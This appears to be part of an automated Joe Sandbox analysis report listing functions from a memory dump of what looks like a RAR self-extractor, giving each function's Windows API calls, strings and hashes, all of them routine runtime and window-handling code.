                                                              • Instruction ID: 4ff6476733e8867e0dd1a822bc1dcda9a6e5ddec79584ee759fb6171649e8b28
                                                              • Opcode Fuzzy Hash: c36ba4c610c2fb58c0c05aa9385fb6c167c5529fdedfbf5b93b11954b393c759
                                                              • Instruction Fuzzy Hash: 643108B5D053189BDF10DFA5D989BCDBBF8BF19304F1041AAE409A7290EB719A898F44
                                                              Function 00E84948 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E8496E
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                                • Part of subcall function 00E87B46: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00E8498A,?,00000000,00000000,?,?,?,00E8498A,?,?,00000050), ref: 00E87B63
                                                              • _strlen.LIBCMT ref: 00E8498F
                                                              • SetDlgItemTextW.USER32(?,00EB3154,?), ref: 00E849EF
                                                              • GetWindowRect.USER32(?,?), ref: 00E84A29
                                                              • GetClientRect.USER32(?,?), ref: 00E84A35
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E84AD5
                                                              • GetWindowRect.USER32(?,?), ref: 00E84B02
                                                              • SetWindowTextW.USER32(?,?), ref: 00E84B3B
                                                              • GetSystemMetrics.USER32(00000008), ref: 00E84B43
                                                              • GetWindow.USER32(?,00000005), ref: 00E84B4E
                                                              • GetWindowRect.USER32(00000000,?), ref: 00E84B7B
                                                              • GetWindow.USER32(00000000,00000002), ref: 00E84BED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$T1$d$1
                                                              • API String ID: 2407758923-2160731728
                                                              • Opcode ID: a05ec43908c88b983ecda9bb4bc7174fb43c8a8003d8936adddb20ff8831b4bb
                                                              • Instruction ID: a71257a66c38bbdb16dacc8684ece40cabc8e4ab2ae84a3f88f059610820e839
                                                              • Opcode Fuzzy Hash: a05ec43908c88b983ecda9bb4bc7174fb43c8a8003d8936adddb20ff8831b4bb
                                                              • Instruction Fuzzy Hash: A881D4B2104346AFD710EF69CD89E6BBBE8EBC8704F05151DF988E7291D630E9098B52
                                                              Function 00EA14A2 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 00EA14E6
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA109E
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10B0
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10C2
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10D4
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10E6
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA10F8
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA110A
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA111C
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA112E
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1140
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1152
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1164
                                                                • Part of subcall function 00EA1081: _free.LIBCMT ref: 00EA1176
                                                              • _free.LIBCMT ref: 00EA14DB
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00EA14FD
                                                              • _free.LIBCMT ref: 00EA1512
                                                              • _free.LIBCMT ref: 00EA151D
                                                              • _free.LIBCMT ref: 00EA153F
                                                              • _free.LIBCMT ref: 00EA1552
                                                              • _free.LIBCMT ref: 00EA1560
                                                              • _free.LIBCMT ref: 00EA156B
                                                              • _free.LIBCMT ref: 00EA15A3
                                                              • _free.LIBCMT ref: 00EA15AA
                                                              • _free.LIBCMT ref: 00EA15C7
                                                              • _free.LIBCMT ref: 00EA15DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: 88$p=
                                                              • API String ID: 161543041-980160608
                                                              • Opcode ID: 41c206516c153a6a000cf2e18b8a35cf43fa01cf26cbc81bc953dd5209e34a83
                                                              • Instruction ID: 57b23850acaa836295a27b2cd999342f4bef34472557f9bc81d67850d81c73cb
                                                              • Opcode Fuzzy Hash: 41c206516c153a6a000cf2e18b8a35cf43fa01cf26cbc81bc953dd5209e34a83
                                                              • Instruction Fuzzy Hash: 54316F71A086449FDF20AAB8DC45B9AB3E9EF46314F14649AE459FB191DF30FD80CB11
                                                              Function 00E8E931 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E8E956
                                                              • _wcslen.LIBCMT ref: 00E8E9F6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00E8EA05
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E8EA26
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E8EA4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-4209811716
                                                              • Opcode ID: 5fce3b07afdf8713464113574e2173f27a526101e563659926b045bac0a975ba
                                                              • Instruction ID: 8bbc9948a5d8eed713563fdcbb2f7fcd241c153c6d60d68c58d1b8d93a9d97c8
                                                              • Opcode Fuzzy Hash: 5fce3b07afdf8713464113574e2173f27a526101e563659926b045bac0a975ba
                                                              • Instruction Fuzzy Hash: D53127721043017FEB28BB749C46F6F779CAF86714F24205EF509B62D2EB64A90883A5
                                                              Function 00E926DE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 00E92701
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 00E9272D
                                                                • Part of subcall function 00E87D24: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00E82FEC,?,?,?,00E82F99,?,-00000002,?,00000000,?), ref: 00E87D3A
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E92749
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E92760
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00E92774
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E9279D
                                                              • DeleteObject.GDI32(00000000), ref: 00E927A4
                                                              • GetWindow.USER32(00000000,00000002), ref: 00E927AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 4a7f5557a0788a0769f338a9b540ba95b476464ec3f0cf0b9bc0a223563d03bb
                                                              • Instruction ID: a569570c40dbaebe03041ec23029fb5b4509fbe38628ff412e2a272cb8fd1ca8
                                                              • Opcode Fuzzy Hash: 4a7f5557a0788a0769f338a9b540ba95b476464ec3f0cf0b9bc0a223563d03bb
                                                              • Instruction Fuzzy Hash: 6E1127721407547FEF20B7B19C89FAF36ECAF54720F001029FA49B9193D6608D0983B0
                                                              Function 00E9E011 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9E025
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00E9E031
                                                              • _free.LIBCMT ref: 00E9E03C
                                                              • _free.LIBCMT ref: 00E9E047
                                                              • _free.LIBCMT ref: 00E9E052
                                                              • _free.LIBCMT ref: 00E9E05D
                                                              • _free.LIBCMT ref: 00E9E068
                                                              • _free.LIBCMT ref: 00E9E073
                                                              • _free.LIBCMT ref: 00E9E07E
                                                              • _free.LIBCMT ref: 00E9E08C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 82839c61ef58ab2dd0246928a507ebc8918cd905d05f6ff0cf804586b243c50a
                                                              • Instruction ID: 4845721e8855495dd7079b61f15594749d150b7300cc374e3bad5ee0eede0e69
                                                              • Opcode Fuzzy Hash: 82839c61ef58ab2dd0246928a507ebc8918cd905d05f6ff0cf804586b243c50a
                                                              • Instruction Fuzzy Hash: 0811627A514158AFCF01EF94CD42D9D3BE9EF09350B5150A6BA18AB222DB31EA50DB81
                                                              Function 00E977B1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 00E978D0
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00E979DE
                                                              • _UnwindNestedFrames.LIBCMT ref: 00E97B30
                                                              • CallUnexpected.LIBVCRUNTIME ref: 00E97B4B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm$[[
                                                              • API String ID: 2751267872-3215828536
                                                              • Opcode ID: e48b90f6cd45628a416646d1a1b7354a28eb8f19a0ab9bff2044fc18ad259cd6
                                                              • Instruction ID: 4251f0b245a9455d6b46081516191edd0f7ef077a9bb2f275995b404e1102e84
                                                              • Opcode Fuzzy Hash: e48b90f6cd45628a416646d1a1b7354a28eb8f19a0ab9bff2044fc18ad259cd6
                                                              • Instruction Fuzzy Hash: ABB1AC31828219EFCF29DFA4C8419AEBBB5FF04314F14605AE8907B212D771EE59CB91
                                                              Function 00E8F0F5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00E8F10E
                                                              • GetWindowRect.USER32(?,00000000), ref: 00E8F164
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00E8F1FB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00E8F203
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00E8F219
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: RarHtmlClassName$z2$1
                                                              • API String ID: 3937224194-3439405266
                                                              • Opcode ID: b50128eabd20b82e2300fa4e99a79b420620b27de7b89ba7f113aca0fc5b3638
                                                              • Instruction ID: 0ba5aaf7867b35311243a816a11b53d7fe674611384dd582af211cc41bcda01b
                                                              • Opcode Fuzzy Hash: b50128eabd20b82e2300fa4e99a79b420620b27de7b89ba7f113aca0fc5b3638
                                                              • Instruction Fuzzy Hash: 8041A031105214EFCB11AFA1EC8CB9BBBE8EB48715F14456AF94DB9162DB34D904CB61
                                                              Function 00E90600 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • EndDialog.USER32(?,00000001), ref: 00E90650
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E90677
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00E90690
                                                              • SetWindowTextW.USER32(?,?), ref: 00E906A1
                                                              • GetDlgItem.USER32(?,00000065), ref: 00E906AA
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E906BE
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E906D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: 27ec586409f1fb1e6889f4db7ccd39ef17a7300960ce4cc33600cdede68ab67e
                                                              • Instruction ID: 53fcde2b761fe839c3217ec86b6be4aaebac47ddba89d49aa511f6815e7da326
                                                              • Opcode Fuzzy Hash: 27ec586409f1fb1e6889f4db7ccd39ef17a7300960ce4cc33600cdede68ab67e
                                                              • Instruction Fuzzy Hash: B6210A322002487FDA116FA2EC8DF3B3BBCEB4AB94F411015F204F95E2CB52A915D631
                                                              Function 00E97230 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00E97267
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00E9726F
                                                              • _ValidateLocalCookies.LIBCMT ref: 00E972F8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00E97323
                                                              • _ValidateLocalCookies.LIBCMT ref: 00E97378
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm$pY
                                                              • API String ID: 1170836740-1810000616
                                                              • Opcode ID: 6493f3212a47772a9917f4f04e325e1f46ca30d490bfe2fd2f80d5c6792d2541
                                                              • Instruction ID: 009b614ecd73d74a82764c63e9c66bc11fac86fd51e65d41032ac9574c59812f
                                                              • Opcode Fuzzy Hash: 6493f3212a47772a9917f4f04e325e1f46ca30d490bfe2fd2f80d5c6792d2541
                                                              • Instruction Fuzzy Hash: 04410570A24208AFCF10DF69C881A9E7BF5BF46318F149195FC14BB362D731AA49CB90
                                                              Function 00E9E105 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E109
                                                              • _free.LIBCMT ref: 00E9E13C
                                                              • _free.LIBCMT ref: 00E9E164
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E171
                                                              • SetLastError.KERNEL32(00000000), ref: 00E9E17D
                                                              • _abort.LIBCMT ref: 00E9E183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID: x7
                                                              • API String ID: 3160817290-374306512
                                                              • Opcode ID: 2657842758c3fb013d9a8e3b65a6e5719f65a4c2f1525f048d745c5e5ff6fdf7
                                                              • Instruction ID: 2203ec615c3808f49b6ac0fd64afb6830864da94925ea1f9bfbf357b36b13969
                                                              • Opcode Fuzzy Hash: 2657842758c3fb013d9a8e3b65a6e5719f65a4c2f1525f048d745c5e5ff6fdf7
                                                              • Instruction Fuzzy Hash: 58F0C836145A106BDF12B3376D4AA5F2AA99BC6B65F252124FB19F23A2FF31C8064121
                                                              Function 00E8EF1E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: a317f525043052c00f6eda2c1551dfb4ba2f438297ea7de0879580784ef888dd
                                                              • Instruction ID: 39fa941fc3c5494016a97ee6cfbd01607f408a5815661993c15e0e01bd624cc9
                                                              • Opcode Fuzzy Hash: a317f525043052c00f6eda2c1551dfb4ba2f438297ea7de0879580784ef888dd
                                                              • Instruction Fuzzy Hash: 0651075674032359DB307A249811B7663E0DF65758F68243AFACDBF3C1FBA58C818361
                                                              Function 00EA401D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00EA4792,00000000,00000000,00000000,00000000,00000000,00E99B37), ref: 00EA405F
                                                              • __fassign.LIBCMT ref: 00EA40DA
                                                              • __fassign.LIBCMT ref: 00EA40F5
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00EA411B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,00EA4792,00000000,?,?,?,?,?,?,?,?,?,00EA4792,00000000), ref: 00EA413A
                                                              • WriteFile.KERNEL32(?,00000000,00000001,00EA4792,00000000,?,?,?,?,?,?,?,?,?,00EA4792,00000000), ref: 00EA4173
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 04489c3e7af5a7fc22d39e8c947cd35206c6d2996e2cf195b405442b02019520
                                                              • Instruction ID: d5be23f46637f11a4951f78bc74d3127632bff2fd99ad2063cf66de5b6d0a8d2
                                                              • Opcode Fuzzy Hash: 04489c3e7af5a7fc22d39e8c947cd35206c6d2996e2cf195b405442b02019520
                                                              • Instruction Fuzzy Hash: 1051E5B09002489FCB14CFA8DC81AEEBBF8EF5D304F14451AE955FB291D770A945CB61
                                                              Function 00E8EB75 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
